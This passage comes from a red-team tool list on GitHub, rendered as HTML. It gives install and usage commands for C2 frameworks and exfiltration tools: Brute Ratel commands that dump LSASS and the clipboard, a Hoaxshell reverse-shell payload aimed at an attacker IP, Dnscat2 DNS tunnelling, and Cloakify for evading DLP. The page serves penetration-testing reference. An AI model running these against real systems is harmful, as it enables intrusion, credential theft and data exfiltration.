class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Interact with session 1\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e sessions -i 1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run local command 'ls'\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e!\u003c/span\u003els\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found on the \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Basic-Usage\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe wiki contains good \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation\"\u003epost exploitation information\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Screenshots\"\u003ehttps://github.com/n1nj4sec/pupy/wiki/Screenshots\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://bruteratel.com/\" rel=\"nofollow\"\u003eBrute Ratel\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-brute-ratel\" class=\"anchor\" aria-label=\"Permalink: 🔙Brute Ratel\" href=\"#brute-ratel\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBruteRatel is a great command and control (C4) framework created by \u003ca href=\"https://twitter.com/NinjaParanoid\" rel=\"nofollow\"\u003e@NinjaParanoid\u003c/a\u003e. The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome nice features:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDNS Over HTTPS\u003c/li\u003e\n\u003cli\u003eIndirect Syscalls\u003c/li\u003e\n\u003cli\u003eBuilt-in Debugger To Detect EDR Userland Hooks\u003c/li\u003e\n\u003cli\u003eMITRE graph integration\u003c/li\u003e\n\u003cli\u003eAdversary TTP automation\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTo legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the \u003ca href=\"https://bruteratel.com/pricing/\" rel=\"nofollow\"\u003epricing page\u003c/a\u003e for more information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAfter purchase you can download the framework from \u003ca href=\"https://bruteratel.com/tabs/download/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e with your Activation Key and License User ID.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Loads a powershell script to memory which can be Invoked using psreflect\npsimport\n\n# Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock\nlock_input\n\n# Dumps user clipboard\ndumpclip\n\n# Enumerates basic domain information\ndcenum\n\n# Elevates user privileges to SYSTEM (Requires admin rights)\nget_system\n\n# Takes a screenshot of current desktop and stores it on the server\nscreenshot\n\n# Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique\nshadowclone\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loads a powershell script to memory which can be Invoked using psreflect\u003c/span\u003e\npsimport\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock\u003c/span\u003e\nlock_input\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Dumps user clipboard\u003c/span\u003e\ndumpclip\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerates basic domain information\u003c/span\u003e\ndcenum\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Elevates user privileges to SYSTEM (Requires admin rights)\u003c/span\u003e\nget_system\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Takes a screenshot of current desktop and stores it on the server\u003c/span\u003e\nscreenshot\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique\u003c/span\u003e\nshadowclone\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull commander terminal usage information can be found \u003ca href=\"https://bruteratel.com/tabs/badger/badgers/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://bruteratel.com/\" rel=\"nofollow\"\u003ehttps://bruteratel.com/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/chvancooten/NimPlant\"\u003eNimPlant\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-nimplant\" class=\"anchor\" aria-label=\"Permalink: 🔙NimPlant\" href=\"#nimplant\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA light-weight first-stage C2 implant written in Nim.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLightweight and configurable implant written in the Nim programming language\u003c/li\u003e\n\u003cli\u003eEncryption and compression of all traffic by default, obfuscates static strings in implant artefacts\u003c/li\u003e\n\u003cli\u003eSupport for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables\u003c/li\u003e\n\u003cli\u003eEasy deployment of more advanced functionality or payloads via \u003ccode\u003einline-execute\u003c/code\u003e, \u003ccode\u003eshinject\u003c/code\u003e (using dynamic invocation), or in-thread \u003ccode\u003eexecute-assembly\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eComprehensive logging of all interactions and file operations\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl https://nim-lang.org/choosenim/init.sh -sSf | sh\nchoosenim stable\ngit clone https://github.com/chvancooten/NimPlant\ncd client\nnimble install -d\npip3 install -r server/requirements.txt\napt install mingw-w64\"\u003e\u003cpre\u003ecurl https://nim-lang.org/choosenim/init.sh -sSf \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sh\nchoosenim stable\ngit clone https://github.com/chvancooten/NimPlant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e client\nnimble install -d\npip3 install -r server/requirements.txt\napt install mingw-w64\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate payloads\npython .\\NimPlant.py compile all\n\n# Start server\npython .\\NimPlant.py server \"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate payloads\u003c/span\u003e\npython .\u003cspan class=\"pl-cce\"\u003e\\N\u003c/span\u003eimPlant.py compile all\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start server\u003c/span\u003e\npython .\u003cspan class=\"pl-cce\"\u003e\\N\u003c/span\u003eimPlant.py server \u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBefore running make sure to create the \u003ccode\u003econfig.tool\u003c/code\u003e configuration file, more information can be found \u003ca href=\"https://github.com/chvancooten/NimPlant#getting-started\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/chvancooten/NimPlant#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/\" rel=\"nofollow\"\u003eBlog - Building a C2 Implant in Nim - Considerations and Lessons Learned\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://casvancooten.com\" rel=\"nofollow\"\u003ehttps://casvancooten.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/t3l3machus/hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hoaxshell\" class=\"anchor\" aria-label=\"Permalink: 🔙Hoaxshell\" href=\"#hoaxshell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\"\u003e\u003cpre\u003egit clone https://github.com/t3l3machus/hoaxshell\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Payload that utilizes Invoke-Expression (default)\nsudo python3 hoaxshell.py -s \u0026lt;your_ip\u0026gt;\n\n# Payload that writes and executes commands from a file\nsudo python3 hoaxshell.py -s \u0026lt;your_ip\u0026gt; -x \u0026quot;C:\\Users\\\\\\$env:USERNAME\\.local\\hack.ps1\u0026quot;\n\n# Encrypted shell session with a trusted certificate\nsudo python3 hoaxshell.py -s \u0026lt;your.domain.com\u0026gt; -t -c \u0026lt;/path/to/cert.pem\u0026gt; -k \u0026lt;path/to/key.pem\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Payload that utilizes Invoke-Expression (default)\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Payload that writes and executes commands from a file\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -x \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Users\u003cspan class=\"pl-cce\"\u003e\\\\\\$\u003c/span\u003eenv:USERNAME\\.local\\hack.ps1\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Encrypted shell session with a trusted certificate\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour.domain.com\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -t -c \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003e/path/to/cert.pem\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -k \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epath/to/key.pem\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage documentation \u003ca href=\"https://github.com/t3l3machus/hoaxshell#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.youtube.com/watch?v=SEufgD5UxdU\" rel=\"nofollow\"\u003eUsage Demo - YouTube\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/t3l3machus/hoaxshell#av-bypass-pocs\"\u003eHoaxshell vs AV\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/t3l3machus/hoaxshell\"\u003ehttps://github.com/t3l3machus/hoaxshell\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eExfiltration\u003c/h1\u003e\u003ca id=\"user-content-exfiltration\" class=\"anchor\" aria-label=\"Permalink: Exfiltration\" href=\"#exfiltration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/iagox86/dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dnscat2\" class=\"anchor\" aria-label=\"Permalink: 🔙Dnscat2\" href=\"#dnscat2\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile - Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/server/\ngem install bundler\nbundle install\"\u003e\u003cpre\u003egit clone https://github.com/iagox86/dnscat2.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e dnscat2/server/\ngem install bundler\nbundle install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile - Client)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/client/\nmake\"\u003e\u003cpre\u003egit clone https://github.com/iagox86/dnscat2.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e dnscat2/client/\nmake\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found in the \u003ca href=\"https://github.com/iagox86/dnscat2#compiling\"\u003eInstallation Section\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Establish the server\nruby ./dnscat2.rb DOMAIN.COM\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the server\u003c/span\u003e\nruby ./dnscat2.rb DOMAIN.COM\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Client)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Establish the client with authoritative domain\n./dnscat2 DOMAIN.COM\n\n# Establish the client without authoritative domain\n./dnscat2 --dns host=0.0.0.0,port=0000\n\n# Ping the server from the client\n./dnscat --ping DOMAIN.COM\n\n# Ping the server from the client, with custom dns resolver ip\n./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the client with authoritative domain\u003c/span\u003e\n./dnscat2 DOMAIN.COM\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the client without authoritative domain\u003c/span\u003e\n./dnscat2 --dns host=0.0.0.0,port=0000\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Ping the server from the client\u003c/span\u003e\n./dnscat --ping DOMAIN.COM\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Ping the server from the client, with custom dns resolver ip\u003c/span\u003e\n./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Tunnels)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# (After establishing the client) You can open a new tunnelled port\nlisten [lhost:]lport rhost:rport\n\n# Forward ssh connections through the dnscat2 client to an internal device\nlisten 127.0.0.1:2222 10.10.10.10:22\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e (After establishing the client) You can open a new tunnelled port\u003c/span\u003e\nlisten [lhost:]lport rhost:rport\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Forward ssh connections through the dnscat2 client to an internal device\u003c/span\u003e\nlisten 127.0.0.1:2222 10.10.10.10:22\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found in the \u003ca href=\"https://github.com/iagox86/dnscat2#usage\"\u003eUsage Section\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/TryCatchHCF/Cloakify\"\u003eCloakify\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cloakify\" class=\"anchor\" aria-label=\"Permalink: 🔙Cloakify\" href=\"#cloakify\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWhen exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e You can make your own ciphers, see \u003ca href=\"https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers\"\u003ehere\u003c/a\u003e for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 